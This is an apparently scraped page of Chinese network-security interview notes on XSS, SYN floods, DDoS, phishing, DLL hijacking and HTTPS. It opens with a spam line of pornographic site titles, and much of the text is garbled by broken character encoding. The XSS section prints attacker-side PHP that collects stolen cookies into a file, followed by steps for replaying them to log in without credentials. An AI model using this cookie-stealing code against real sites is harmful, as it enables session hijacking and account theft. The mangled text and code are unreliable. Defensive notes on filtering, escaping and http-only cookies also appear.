日韩精品在线看_黄色成人美女网站_偷窥自拍亚洲色图精选_五月激情综合

　　在面試時(shí)，網(wǎng)絡(luò)安全也會(huì)被經(jīng)常問(wèn)到，至少要知道常見(jiàn)的攻擊，以及防御措施。在這里 Mark 下，不做深入分析。

　　對(duì)稱(chēng)加密和非對(duì)稱(chēng)加密

　　對(duì)稱(chēng)加密：加解密用同一密鑰，密鑰維護(hù)復(fù)雜 n(n-1)/2，不適合互聯(lián)網(wǎng)傳輸密鑰，加解密效率高。應(yīng)用于加密數(shù)據(jù)。

　　非對(duì)稱(chēng)加密：公鑰推不出私鑰，每個(gè)用戶一個(gè)非對(duì)稱(chēng)密鑰對(duì)就可以，適合于互聯(lián)網(wǎng)傳輸公鑰，但是加密效率低，應(yīng)用于數(shù)字簽名及加密。

　　什么是同源策略?

　　為了防止不同域在用戶瀏覽器中彼此干擾，瀏覽器對(duì)從不同來(lái)源(域)收到的內(nèi)容進(jìn)行隔離。瀏覽器不允許任何舊有腳本訪問(wèn)一個(gè)站點(diǎn)的 cookie，否則，會(huì)話容易被劫持。只有發(fā)布 cookie 的站點(diǎn)能夠訪問(wèn)這些 cookie，只有通過(guò)該站點(diǎn)返回的頁(yè)面所包含或加載的 JavaScript 才能訪問(wèn) cookie。

　　cookie 存在哪里?可以打開(kāi)嗎?

　　C:\Users\用戶名\AppData\Roaming\Microsoft\Windows\Cookies工具--文件夾選項(xiàng)--查看--將隱藏被保護(hù)的文件的對(duì)勾去掉就會(huì)看到 cookies 文件夾。

　　xss 如何盜取 cookie?

　　攻擊者代碼：

　　.

　　.$cookie=$_GET['cookie'];.

　　.$time=date('Y-m-d g:i:s');..$referer=getenv('HTTP_REFERER');.

　　.$cookietxt=fopen('cookie.txt','a');.

　　.fwrite($cookietxt,"time:".$time." cookie:".$cookie."referer:".$referer.""); 注意雙引號(hào)，容易出錯(cuò).

　　.fclose($cookietxt);.

　　.?>.腳本端：..獲取到 cookie 后，用 firebug 找到 cookie，新建 cookie加入 cookie，用 referer 來(lái)提交，無(wú)需輸入帳號(hào)密碼直接登錄進(jìn)去!

　　xss 有 cookie 一定可以無(wú)用戶名密碼登錄嗎?

　　基本可以。因?yàn)榘?cookie 的值給瀏覽器，瀏覽器去訪問(wèn)頁(yè)面會(huì)用已有的cookie 去訪問(wèn)，如果 cookie 有效，就會(huì)直接進(jìn)去。

　　xss 如何防御?

　　1. 對(duì)前端輸入做過(guò)濾和編碼：

　　比如只允許輸入指定類(lèi)型的字符，比如電話號(hào)格式，注冊(cè)用戶名限制等，輸入檢查需要在服務(wù)器端完成，在前端完成的限制是容易繞過(guò)的;對(duì)特殊字符進(jìn)行過(guò)濾和轉(zhuǎn)義;

　　2. 對(duì)輸出做過(guò)濾和編碼：在變量值輸出到前端的 HTML 時(shí)進(jìn)行編碼和轉(zhuǎn)義;

　　3. 給關(guān)鍵 cookie 使用 http-only。

　　SYN 攻擊原理

　　SYN 攻擊屬于 DOS 攻擊的一種，它利用 TCP 協(xié)議缺陷，通過(guò)發(fā)送大量的半連接請(qǐng)求，耗費(fèi) CPU 和內(nèi)存資源。

　　SYN 攻擊除了能影響主機(jī)外，還可以危害路由器、防火墻等網(wǎng)絡(luò)系統(tǒng)，事實(shí)上 SYN 攻擊并不管目標(biāo)是什么系統(tǒng)，只要這些系統(tǒng)打開(kāi) TCP 服務(wù)就可以實(shí)施。服務(wù)器接收到連接請(qǐng)求(SYN=1)，將此信息加入未連接隊(duì)列，并發(fā)送請(qǐng)求包給客戶(syn=k,ack=j+1)，此時(shí)進(jìn)入 SYN_RECV 狀態(tài)。當(dāng)服務(wù)器未收到客戶端的確認(rèn)包時(shí)，重發(fā)請(qǐng)求包，一直到超時(shí)，才將此條目從未連接隊(duì)列刪除。配合 IP 欺騙，SYN 攻擊能達(dá)到很好的效果，通常，客戶端在短時(shí)間內(nèi)偽造大量不存在的 IP 地址，向服務(wù)器不斷地發(fā)送 syn 包，服務(wù)器回復(fù)確認(rèn)包，并等待客戶的確認(rèn)，由于源地址是不存在的，服務(wù)器需要不斷的重發(fā)直至超時(shí)，這些偽造的 SYN 包將長(zhǎng)時(shí)間占用未連接隊(duì)列，正常的 SYN 請(qǐng)求被丟棄，目標(biāo)系統(tǒng)運(yùn)行緩慢，嚴(yán)重者引起網(wǎng)絡(luò)堵塞甚至系統(tǒng)癱瘓。

　　什么是網(wǎng)絡(luò)釣魚(yú)?

　　網(wǎng)絡(luò)釣魚(yú)是通過(guò)大量發(fā)送聲稱(chēng)來(lái)自于銀行或其他知名機(jī)構(gòu)的欺騙性垃圾郵件,意圖引誘收信人給出敏感信息(如用戶名、口令、帳號(hào) ID 、ATMPIN 碼或信用卡詳細(xì)信息)的一種攻擊方式。最典型的網(wǎng)絡(luò)釣魚(yú)攻擊將收信人引誘到一個(gè)通過(guò)精心設(shè)計(jì)與目標(biāo)組織的網(wǎng)站非常相似的釣魚(yú)網(wǎng)站上，并獲取收信人在此網(wǎng)站上輸入的個(gè)人敏感信息，通常這個(gè)攻擊過(guò)程不會(huì)讓受害者警覺(jué)。它常常導(dǎo)引用戶到 URL 與接口外觀與真正網(wǎng)站幾無(wú)二致的假冒網(wǎng)站輸入個(gè)人數(shù)據(jù)。就算使用強(qiáng)式加密的 SSL 服務(wù)器認(rèn)證，要偵測(cè)網(wǎng)站是否仿冒實(shí)際上仍很困難。網(wǎng)釣是一種利用社會(huì)工程技術(shù)來(lái)愚弄用戶的實(shí)例。它憑恃的是現(xiàn)行網(wǎng)絡(luò)安全技術(shù)的低親和度。DDOS

　　分布式拒絕服務(wù)(DDoS:Distributed Denial ofService)攻擊指借助于客戶/服務(wù)器技術(shù)，將多個(gè)計(jì)算機(jī)聯(lián)合起來(lái)作為攻擊平臺(tái)，對(duì)一個(gè)或多個(gè)目標(biāo)發(fā)動(dòng)DDoS 攻擊，從而成倍地提高拒絕服務(wù)攻擊的威力。

　　通常，攻擊者使用一個(gè)偷竊帳號(hào)將 DDoS 主控程序安裝在一個(gè)計(jì)算機(jī)上，在一個(gè)設(shè)定的時(shí)間主控程序?qū)⑴c大量代理程序通訊，代理程序已經(jīng)被安裝在網(wǎng)絡(luò)上的許多計(jì)算機(jī)上。代理程序收到指令時(shí)就發(fā)動(dòng)攻擊。利用客戶/服務(wù)器技術(shù)，主控程序能在幾秒鐘內(nèi)激活成百上千次代理程序的運(yùn)行。

　　什么是 CC 攻擊?

　　這個(gè)也是知道一些，知道他是 DDos 的變種，正常請(qǐng)求偽造，服務(wù)器資源耗盡，最終還是看看百科答案吧：CC 攻擊是 DDOS(分布式拒絕服務(wù))的一種，相比其它的 DDOS 攻擊 CC 似乎更有技術(shù)含量一些。這種攻擊你見(jiàn)不到真實(shí)源 IP，見(jiàn)不到特別大的異常流量，但造成服務(wù)器無(wú)法進(jìn)行正常連接。CC 攻擊的原理就是攻擊者控制某些主機(jī)不停地發(fā)大量數(shù)據(jù)包給對(duì)方服務(wù)器造成服務(wù)器資源耗盡，一直到宕機(jī)崩潰。

　　CC 主要是用來(lái)攻擊頁(yè)面的，每個(gè)人都有這樣的體驗(yàn)：當(dāng)一個(gè)網(wǎng)頁(yè)訪問(wèn)的人數(shù)特別多的時(shí)候，打開(kāi)網(wǎng)頁(yè)就慢了，CC 就是模擬多個(gè)用戶(多少線程就是多少用戶)不停地進(jìn)行訪問(wèn)那些需要大量數(shù)據(jù)操作(就是需要大量 CPU 時(shí)間)的頁(yè)面，造成服務(wù)器資源的浪費(fèi)，CPU 長(zhǎng)時(shí)間處于 100%，永遠(yuǎn)都有處理不完的連接直至就網(wǎng)絡(luò)擁塞，正常的訪問(wèn)被中止。

　　Web 服務(wù)器被入侵后，怎樣進(jìn)行排查?

　　最簡(jiǎn)單就是查看下 web 服務(wù)器日志 ，看看有沒(méi)有異常端口開(kāi)放，使用安全狗等服務(wù)器安全軟件清掃

　　dll 文件是什么意思，有什么用?

　　DLL(Dynamic Link Library)文件，即動(dòng)態(tài)鏈接庫(kù)，也有人稱(chēng)作應(yīng)用程序拓展。Windows 應(yīng)用程序中，實(shí)行了模塊化設(shè)計(jì)，也就是說(shuō)并不是每個(gè)應(yīng)用程序都編寫(xiě)完所有的功能代碼，而是在運(yùn)行過(guò)程中調(diào)用相應(yīng)功能的 DLL，不需運(yùn)行的功能就不調(diào)用，所以大大加快了程序的加載速度和效率，其他應(yīng)用程序也可以調(diào)用相關(guān)的 DLL，這樣也有利于促進(jìn)代碼重用以及內(nèi)存使用效率，減少了資源占用，而且程序更新時(shí)也只要更新相關(guān)的 DLL 就可以了。

　　要注意的是，有些病毒也會(huì)偽裝成 DLL 文件，并替換系統(tǒng)的 DLL 文件，需要我們防范。

　　DLL 劫持原理由于輸入表中只包含 DLL 名而沒(méi)有它的路徑名，因此加載程序必須在磁盤(pán)上搜索 DLL 文件。

　　首先會(huì)嘗試從當(dāng)前程序所在的目錄加載 DLL，如果沒(méi)找到，則在 Windows 系統(tǒng)目錄中查找，最后是在環(huán)境變量中列出的各個(gè)目錄下查找。利用這個(gè)特點(diǎn)，先偽造一個(gè)系統(tǒng)同名的 DLL，提供同樣的輸出表，每個(gè)輸出函數(shù)轉(zhuǎn)向真正的系統(tǒng) DLL。程序調(diào)用系統(tǒng) DLL 時(shí)會(huì)先調(diào)用當(dāng)前目錄下偽造的 DLL，完成相關(guān)功能后，再跳到系統(tǒng) DLL 同名函數(shù)里執(zhí)行。這個(gè)過(guò)程用個(gè)形象的詞來(lái)描述就是系統(tǒng) DLL 被劫持(hijack)了。

　　偽造的 dll 制作好后，放到程序當(dāng)前目錄下，這樣當(dāng)原程序調(diào)用原函數(shù)時(shí)就調(diào)用了偽造的 dll 的同名函數(shù)，進(jìn)入劫持 DLL 的代碼，處理完畢后，再調(diào)用原DLL 此函數(shù)。如何防止 DLL 劫持DLL 劫持利用系統(tǒng)未知 DLL 的搜索路徑方式，使得程序加載當(dāng)前目錄下的系統(tǒng)同名 DLL。所以可以告訴系統(tǒng) DLL 的位置，改變加載系統(tǒng) DLL 的順序不是當(dāng)前目錄，而是直接到系統(tǒng)目錄下查找。

　　Https 的作用

　　內(nèi)容加密建立一個(gè)信息安全通道，來(lái)保證數(shù)據(jù)傳輸?shù)陌踩?

　　身份認(rèn)證確認(rèn)網(wǎng)站的真實(shí)性

　　數(shù)據(jù)完整性防止內(nèi)容被第三方冒充或者篡改HTTPS 和 HTTP 的區(qū)別：https 協(xié)議需要到 CA 申請(qǐng)證書(shū)。http 是超文本傳輸協(xié)議，信息是明文傳輸;https 則是具有安全性的 ssl 加密傳輸協(xié)議。http 和 https 使用的是完全不同的連接方式，用的端口也不一樣，前者是 80，后者是 443。http 的連接很簡(jiǎn)單，是無(wú)狀態(tài)的;HTTPS 協(xié)議是由 SSL+HTTP 協(xié)議構(gòu)建的可進(jìn)行加密傳輸、身份認(rèn)證的網(wǎng)絡(luò)協(xié)議，比 http 協(xié)議安全。